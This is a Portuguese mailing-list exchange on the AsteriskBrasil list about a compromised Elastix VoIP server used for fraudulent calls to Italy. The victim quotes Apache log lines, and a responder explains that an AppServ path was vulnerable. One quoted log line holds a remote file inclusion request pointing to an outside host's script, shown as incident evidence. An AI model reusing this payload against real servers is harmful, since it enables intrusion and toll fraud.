Gleidison, > Sidinei, > Obrigado pela Resposta, > cara sofri uma invasao essa madrugada, e os caras arrebentaram de ligaçoes > para a Italia, abaixo peguei o seguinte log. e os caras fizeram um rombo. > alguem poderia me ajudar a bloquear isso. > /var/log/httpd/access_log > 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] "GET /user/soapCaller.bs > HTTP/1.1" 302 305 "-" "Morfeus Fucking Scanner" > 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] "GET > /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? HTTP/1.1" > 302 354 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Você instalou algo mais no seu elastix? Ele faz referência a pastas que não existem no elastix 1.6 padrão, como /user/ e /appserv/ . Pelo que pesquisei na NET esse appserv é um XAMP da vida. E no seu caso, estava com falhas de segurança. Nessa segunda linha do log ele se certifica de que o servidor está 'vulnerável' e depois disso você ta frito. -- Abraço! Alejandro Flores http://www.triforsec.com.br/ _______________________________________________ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br _______________________________________________ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br ______________________________________________ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil ______________________________________________ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org